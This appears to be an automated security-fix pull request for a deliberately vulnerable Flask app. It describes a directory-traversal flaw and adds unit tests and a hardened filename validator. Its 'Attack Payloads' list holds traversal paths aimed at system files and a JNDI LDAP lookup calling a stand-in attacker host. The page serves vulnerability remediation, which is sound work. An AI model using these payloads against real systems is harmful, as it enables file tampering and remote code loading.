AutoFix PR#16

Open

ongamse wants to merge 1 commit into master from qwietai/autofix/fix0001

Conversation

@ongamse (Owner) commented Feb 14, 2025

Qwiet AI AutoFix

This PR was created automatically by the Qwiet AI AutoFix tool.
As long as it is open, subsequent scans and generated fixes to this same branch will be added to it as new commits.

Each commit fixes one vulnerability.

Some manual intervention might be required before merging this PR.

Project Information

Findings/Vulnerabilities Fixed

Finding 32: Directory Traversal: Attacker-controlled Data Used in File Path in actions.py

Commits/Files Changed
Details
Vulnerability Description

Attacker-controlled input data is used as part of a file path to write a file without escaping or validation. This indicates a directory traversal vulnerability.

  • Severity: critical

  • CVSS Score: 9 (critical)

  • CWE: CWE-22: Directory Traversal

Attack Payloads

```json
[
  {"filename": "../../../etc/passwd", "text": "attack_text"},
  {"filename": "..\\..\\..\\windows\\system32\\drivers\\etc\\hosts", "text": "attack_text"},
  {"filename": "./../../../../../../../../../../../../../etc/passwd", "text": "attack_text"},
  {"filename": "~/../../../../../../../../../../etc/passwd", "text": "attack_text"},
  {"filename": "${jndi:ldap://attacker-website/a}", "text": "attack_text"}
]
```
Testcases

```python
import unittest
from unittest.mock import patch, Mock
from flask_webgoat import actions


class TestActions(unittest.TestCase):

    # Patches the Path name as imported into actions so nothing touches disk;
    # the write() on the opened handle is replaced by a Mock.
    @patch('flask_webgoat.actions.Path')
    def test_log_entry(self, mock_path):
        mock_path.return_value.open.return_value.__enter__.return_value.write = Mock()
        response = actions.log_entry()
        self.assertEqual(response.status_code, 200)
        self.assertTrue(mock_path.called)

    # Replaces subprocess.run so no real process is spawned.
    @patch('subprocess.run')
    def test_grep_processes(self, mock_run):
        mock_run.return_value.stdout = b'test_name'
        response = actions.grep_processes()
        self.assertEqual(response.status_code, 200)
        self.assertTrue(mock_run.called)

    # Replaces pickle.loads so no untrusted bytes are actually deserialized.
    @patch('pickle.loads')
    def test_deserialized_descr(self, mock_loads):
        mock_loads.return_value = 'test_description'
        response = actions.deserialized_descr()
        self.assertEqual(response.status_code, 200)
        self.assertTrue(mock_loads.called)


if __name__ == '__main__':
    unittest.main()
```
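Added example, not code from this PR or from the flask_webgoat project: a hardened version of the kind of write the description flags, with an allow-list on the request-supplied filename and a containment check on the resolved path. The function names (`resolve_log_path`, `log_entry_safe`, `is_rejected`, `run_demo`) and the single `base_dir` log directory are assumptions; the five rejected inputs are the page's own payload list.

```python
import re, tempfile
from pathlib import Path

# Allow-list for the request-supplied name: one path component, no separators,
# no leading dot (blocks '.', '..' and hidden files), no '~', '$' or '\'.
_SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")
class UnsafeFilename(ValueError):
    """Raised when a request-supplied filename fails validation."""
def resolve_log_path(base_dir: Path, filename: str) -> Path:
    """Return base_dir/filename or raise UnsafeFilename. Two independent checks:
    an allow-list on the raw name, then containment of the resolved path."""
    if not _SAFE_NAME.fullmatch(filename):
        raise UnsafeFilename(f"rejected filename {filename!r}")
    base = base_dir.resolve()
    target = (base / filename).resolve()
    # resolve() follows symlinks, so a link planted in base_dir is caught too.
    if target.parent != base:
        raise UnsafeFilename(f"path escapes log directory: {filename!r}")
    return target

def log_entry_safe(base_dir: Path, filename: str, text: str) -> Path:
    """Hardened write: validate first, then append under base_dir."""
    target = resolve_log_path(base_dir, filename)
    with target.open("a", encoding="utf-8") as fh:
        fh.write(text + "\n")
    return target

def is_rejected(base_dir: Path, filename: str) -> bool:
    try:
        resolve_log_path(base_dir, filename)
        return False
    except UnsafeFilename:
        return True
# The five filenames listed under "Attack Payloads" in the PR description.
PAYLOADS = [
    "../../../etc/passwd",
    "..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
    "./../../../../../../../../../../../../../etc/passwd",
    "~/../../../../../../../../../../etc/passwd",
    "${jndi:ldap://attacker-website/a}",
]

def run_demo() -> dict:
    """Exercise the checks in a scratch directory and report what happened."""
    with tempfile.TemporaryDirectory() as d:
        base = Path(d)
        rejected = [is_rejected(base, p) for p in PAYLOADS]
        written = log_entry_safe(base, "entry.log", "hello")
        return {"rejected": rejected, "inside_base": written.parent == base.resolve(),
                "content": written.read_text(encoding="utf-8")}
```

All five listed payloads fail the allow-list before any path is built; the containment check is the second line of defence for the case where the allow-list is later loosened.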